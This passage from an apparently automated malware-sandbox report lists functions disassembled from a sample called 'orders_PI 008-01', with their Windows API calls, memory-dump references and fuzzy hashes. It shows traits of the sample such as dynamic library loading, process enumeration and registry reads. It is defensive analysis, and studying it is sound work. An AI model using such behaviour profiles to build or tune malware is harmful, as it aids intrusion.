                                        • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                        • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                        • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                        • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                        Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                        • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                        • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                        • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                        Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004301AD
                                        • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID:
                                        • API String ID: 1297977491-0
                                        • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                        • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                        • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                        • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                        Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                        • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                        • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                        • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                        Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                          • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                          • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                          • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$Time$CloseCompareCreateHandlememset
                                        • String ID:
                                        • API String ID: 2154303073-0
                                        • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                        • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                        • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                        • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                        Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                        • String ID:
                                        • API String ID: 3150196962-0
                                        • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                        • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                        • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                        • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                        Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$PointerRead
                                        • String ID:
                                        • API String ID: 3154509469-0
                                        • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                        • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                        • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                        • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                        Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                          • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                          • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                          • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                        • String ID:
                                        • API String ID: 4232544981-0
                                        • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                        • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                        • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                        • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                        Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                        • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                        • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                        • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                        Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$FileModuleName
                                        • String ID:
                                        • API String ID: 3859505661-0
                                        • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                        • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                        • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                        • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                        Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                        • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                        • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                        • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                        Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                        • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                        • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                        • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                        Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                        • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                        • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                        • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                        Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                        • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                        • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                        • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                        Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                        • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                        • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                        • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                        Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                        • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                        • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                        • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                        Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                        • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                        • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                        • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                        Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: EnumNamesResource
                                        • String ID:
                                        • API String ID: 3334572018-0
                                        • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                        • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                        • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                        • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                        Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                        • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                        • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                        • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                        Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                        • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                        • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                        • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                        Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
